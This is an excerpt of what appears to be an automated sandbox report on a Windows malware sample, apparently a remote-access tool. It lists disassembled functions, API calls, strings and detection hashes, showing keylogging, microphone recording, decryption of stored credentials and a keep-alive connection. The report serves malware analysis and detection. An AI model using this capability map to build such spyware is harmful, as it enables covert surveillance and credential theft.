            • API String ID: 3469354165-3547787478
            • Opcode ID: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
            • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
            • Opcode Fuzzy Hash: 79d62a6595cf55298d25edce903250e1b179ff19ced7e633b316f4f85634b2f8
            • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
            Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • _free.LIBCMT ref: 00442318
            • _free.LIBCMT ref: 0044232F
            • _free.LIBCMT ref: 0044234E
            • _free.LIBCMT ref: 00442369
            • _free.LIBCMT ref: 00442380
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$AllocateHeap
            • String ID:
            • API String ID: 3033488037-0
            • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
            • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
            • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
            • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
            Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
            • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
            • _free.LIBCMT ref: 004468EC
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00446AB8
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
            • String ID:
            • API String ID: 1286116820-0
            • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
            • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
            • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
            • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
            Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
            • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
            • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
            • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
            Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
            • __alloca_probe_16.LIBCMT ref: 0044E391
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
            • __freea.LIBCMT ref: 0044E3FD
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
            • String ID:
            • API String ID: 313313983-0
            • Opcode ID: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
            • Instruction ID: e15509fa74df4b182af5404410fa86f763612774b1e54c01db9847f8ec559460
            • Opcode Fuzzy Hash: 655f7a8a6140fe06f74d4810f19312272e80c6b42afcaa61e472fb93c242db7b
            • Instruction Fuzzy Hash: BC31D232A0021AABEF259F66DC45DAF7BA5EF40710F05016AFC04DB291EB39DD51CB98
            Function 00401BC9 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
            Download Yara Rule
            APIs
            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
            • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
            • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
            • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
            • waveInStart.WINMM ref: 00401CDE
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
            • String ID:
            • API String ID: 1356121797-0
            • Opcode ID: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
            • Instruction ID: fb7f9cdbf736b3995f9a1dd050f0e4013ef0d97c015e7d4644af59ef24d86031
            • Opcode Fuzzy Hash: a5aa28857088cf9e2c0b2d910deecd96170581a9a307f5b2914fac260bae8331
            • Instruction Fuzzy Hash: 77212C326242019BC7049FEABD0591A7BA9FB89714740943BF58DD7AB1FBF844098B0E
            Function 0044C53A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
            Download Yara Rule
            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
              • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
            • _free.LIBCMT ref: 0044C59F
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
            • String ID:
            • API String ID: 336800556-0
            • Opcode ID: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
            • Instruction ID: 9106a42af1dcf347f359e8079d91fbce8cfabd6158495d04cb7d137736bc8ec9
            • Opcode Fuzzy Hash: 55ab520b62cbc01e0d1004e3f78ad65e034532d4f5c4574cc0f3edc3ad35f3b1
            • Instruction Fuzzy Hash: AD0171726037257F37611AA75CC8C7F7A6DDAC6BA5319016BB904C3201EA79EE0181B8
            Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
            • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
            • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$CloseHandle$CreatePointerWrite
            • String ID:
            • API String ID: 1852769593-0
            • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
            • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
            • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
            • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
            Function 0040FBC8 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
            Download Yara Rule
            APIs
            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
            • int.LIBCPMT ref: 0040FBE8
              • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
              • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
            • std::_Facet_Register.LIBCPMT ref: 0040FC28
            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
            • String ID:
            • API String ID: 2536120697-0
            • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
            • Instruction ID: 5713401f36b8bb0c26d90e6cd89a0375aabf3697ea4116ccadb9116029d1f595
            • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
            • Instruction Fuzzy Hash: 9811C172904118A7CB24EFA5D80289FB778EF44325F10417FFD44B7291DA389E4A87D8
            Function 004457A9 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetLastError.KERNEL32(?,00000000,?,00439A11,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004457AE
            • _free.LIBCMT ref: 004457E3
            • _free.LIBCMT ref: 0044580A
            • SetLastError.KERNEL32(00000000), ref: 00445817
            • SetLastError.KERNEL32(00000000), ref: 00445820
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free
            • String ID:
            • API String ID: 3170660625-0
            • Opcode ID: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
            • Instruction ID: 04032910ca93e9be015006ee1c204adc37b37130fda50a8933af11b0a5b4c0b1
            • Opcode Fuzzy Hash: 8116442bc0b7785a5c87a9e5c1511c9661b86afcbe0e70ddbbe26362d10e1a04
            • Instruction Fuzzy Hash: 4101FE36100F0077FB127B366CC992B15699FC2B7AB21413BF40592293EE7DCC01462D
            Function 0044DB9C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 0044DBB4
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 0044DBC6
            • _free.LIBCMT ref: 0044DBD8
            • _free.LIBCMT ref: 0044DBEA
            • _free.LIBCMT ref: 0044DBFC
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
            • Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
            • Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
            • Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C
            Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
            Download Yara Rule
            APIs
            • _free.LIBCMT ref: 00441566
              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
            • _free.LIBCMT ref: 00441578
            • _free.LIBCMT ref: 0044158B
            • _free.LIBCMT ref: 0044159C
            • _free.LIBCMT ref: 004415AD
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
            • Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
            • Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
            • Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E
            Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
            Download Yara Rule
            APIs
            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Enum$InfoQueryValue
            • String ID: [regsplt]
            • API String ID: 3554306468-4262303796
            • Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
            • Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
            • Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
            • Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8
            Function 0044B8C9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
            Download Yara Rule
            APIs
            • _strpbrk.LIBCMT ref: 0044B918
            • _free.LIBCMT ref: 0044BA35
              • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
              • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
              • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
            • String ID: *?$.
            • API String ID: 2812119850-3972193922
            • Opcode ID: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
            • Instruction ID: d7c010aeaec7a8a897f36992f2f7f2874d2ac4fe7d304ea8792e53e8e447d7e7
            • Opcode Fuzzy Hash: 5dfc5c04e88bff774400eef92f9a188e96d7e5ade9dca766e11bbcc0c0b71fd5
            • Instruction Fuzzy Hash: 9C51C371E002099FEF14DFA9C881AAEB7B5EF48314F24816EE954E7301E779DE018B94
            Function 00442B2D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: __alloca_probe_16__freea
            • String ID: H"G$H"GH"G
            • API String ID: 1635606685-3036711414
            • Opcode ID: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
            • Instruction ID: 3c870ea2fb57449e7c992ce38f4d69c2eab2d9a05dd359c3c94aeedaa7d51697
            • Opcode Fuzzy Hash: 80076ff913fd6fdf96b59eec9a2e877d4b1c448352c335ccfb263d7e6081886f
            • Instruction Fuzzy Hash: F0411931A00212ABEB219F65CD82A5FB7A1EF45714F54056FF804DB291EBBCDD40879E
            Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 0040189E
            • ExitThread.KERNEL32 ref: 004018D6
            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
              • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
            • String ID: 8:G
            • API String ID: 1649129571-405301104
            • Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
            • Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
            • Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
            • Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E
            Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
            Download Yara Rule
            APIs
            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe,00000104), ref: 00440975
            • _free.LIBCMT ref: 00440A40
            • _free.LIBCMT ref: 00440A4A
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: _free$FileModuleName
            • String ID: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
            • API String ID: 2506810119-4105654757
            • Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
            • Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
            • Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
            • Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59
            Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
              • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
              • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
              • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
            • _wcslen.LIBCMT ref: 00419744
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
            • String ID: .exe$program files (x86)\$program files\
            • API String ID: 37874593-1203593143
            • Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
            • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
            • Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
            • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
            Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
            Download Yara Rule
            APIs
            • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
            • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
            • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CreateThread$LocalTimewsprintf
            • String ID: Offline Keylogger Started
            • API String ID: 465354869-4114347211
            • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
            • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
            • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
            • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
            Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
              • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
            • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
            • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
            • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CreateThread$LocalTime$wsprintf
            • String ID: Online Keylogger Started
            • API String ID: 112202259-1258561607
            • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
            • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
            • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
            • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
            Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
            Download Yara Rule
            APIs
            • GetLocalTime.KERNEL32(?), ref: 00404F61
            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
            • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
            Strings
            • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Create$EventLocalThreadTime
            • String ID: Connection KeepAlive | Enabled | Timeout:
            • API String ID: 2532271599-507513762
            • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
            • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
            • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
            • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
            Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
            • GetProcAddress.KERNEL32(00000000), ref: 00406097
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: CryptUnprotectData$crypt32
            • API String ID: 2574300362-2380590389
            • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
            • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
